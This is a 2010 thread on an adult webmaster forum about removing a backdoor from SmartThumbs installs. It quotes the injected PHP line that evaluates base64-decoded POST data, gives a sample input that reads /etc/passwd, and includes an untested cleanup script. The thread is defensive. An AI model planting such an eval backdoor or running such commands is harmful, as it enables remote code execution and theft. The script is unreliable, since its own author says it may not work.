GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   removing ST exploit (https://gfy.com/showthread.php?t=967470)

MMarko 05-08-2010 06:39 AM
removing ST exploit
 
I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

Remove SmartThumbs exploit in 5 steps

boneless 05-08-2010 06:50 AM
i read it and got a small question:

it says if you got the include line and the base64 line then youre still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?

boneless 05-08-2010 06:55 AM
damn just found the other line as well, except it aint including sesa.tmp but webcam.tmp.

should i show the post you made to my sys admin and have them take care of it? or do it myself, as i dont have access to phpmyadmin. my host normally does that type of stuff.

is there any other way besides phpmyadmin to do this?

MMarko 05-08-2010 08:06 AM
you're infected for sure

well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable to edit table values

k0nr4d 05-08-2010 08:20 AM
untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

PHP Code:
<?php
$dbserver '';
$dbuser ''
$dbpass ''
$dbname ''
$dblink mysql_connect($dbserver,$dbuser,$dbpass);
mysql_select_db($dbname,$dblink);

copy("st/admin/variables.php","tmp/variables.bak"); 
$string file_get_contents("st/admin/variables.php");
$string str_replace("@eval(base64_decode($_POST[qxp]));//’;","",$string); 
file_put_contents("st/admin/variables.php",$string);
unlink("/tmp/sesa.tmp");
unlink("/tmp/webcam.tmp");
include('st/admin/variables.php'); 
mysql_query("UPDATE st_settings SET niche = '$niche'");
exit("Done"); 
?>

grumpy 05-08-2010 08:24 AM
Quote:
Originally Posted by k0nr4d (Post 17121525)
untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

PHP Code:
<?php
$dbserver '';
$dbuser ''
$dbpass ''
$dbname ''
$dblink mysql_connect($dbserver,$dbuser,$dbpass);
mysql_select_db($dbname,$dblink);

copy("st/admin/variables.php","tmp/variables.bak"); 
$string file_get_contents("st/admin/variables.php");
$string str_replace("@eval(base64_decode($_POST[qxp]));//?;","",$string); 
file_put_contents("st/admin/variables.php",$string);
unlink("/tmp/sesa.tmp");
unlink("/tmp/webcam.tmp");
include('st/admin/variables.php'); 
mysql_query("UPDATE st_settings SET niche = '$niche'");
exit("Done"); 
?>

$niche is undefined

k0nr4d 05-08-2010 08:26 AM
Quote:
Originally Posted by grumpy (Post 17121534)
$niche is undefined
Sure it is, its including the variables.php file before inserting it

PXN 05-08-2010 09:25 AM
nice stuff. Thanks for sharing.

MMarko 05-08-2010 04:50 PM
Code:
$dbserver = '';
$dbuser = '';
$dbpass = '';
$dbname = '';
you should include st/classes/mysql.php before that... and remove those lines completely...

however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup...

rowan 05-08-2010 06:32 PM
Quote:
Originally Posted by boneless (Post 17121341)
i read it and got a small question:

it says if you got the include line and the base64 line then youre still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?
FYI that little bit of code executes whatever is passed in variable 'qxp'

So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file)

Davy 05-09-2010 02:05 AM
Quote:
Originally Posted by boneless (Post 17121341)
@eval(base64_decode($_POST[qxp]));
Holy shit. Who in the right state of mind would add such a code to their product? Yikes! :2 cents:

CyberHustler 05-09-2010 02:14 AM
:Oh crap

LoveSandra 05-09-2010 06:19 AM
wtf.......................

nation-x 05-09-2010 07:29 AM
Quote:
Originally Posted by Davy (Post 17123146)
Holy shit. Who in the right state of mind would add such a code to their product? Yikes! :2 cents:
uuuuuhhhhh wut??

Davy 05-09-2010 08:09 AM
Quote:
Originally Posted by nation-x (Post 17123485)
uuuuuhhhhh wut??
This thread is about a security exploit. I thought the info above was the security hole. :1orglaugh

u-Bob 05-09-2010 08:18 AM
if you box was compromised, there's only 1 thing to do: reinstall everything.

MMarko 05-13-2010 03:12 AM
lol, yes and for every wordpress exploit everyone should reinstall whole box :D

don't be silly

u-Bob 05-13-2010 04:44 AM
Quote:
Originally Posted by MMarko (Post 17134587)
lol, yes and for every wordpress exploit everyone should reinstall whole box :D
simple answer: yes.

Shoplifter 05-13-2010 12:40 PM
Bumping this to the top. I think this exploit is not getting the attention it deserves.

We cleaned a number of sites and in some case the exploit was back in 3 hours.

Tulku 05-13-2010 01:39 PM
Bumping ..


All times are GMT -7. The time now is 09:48 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2026, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123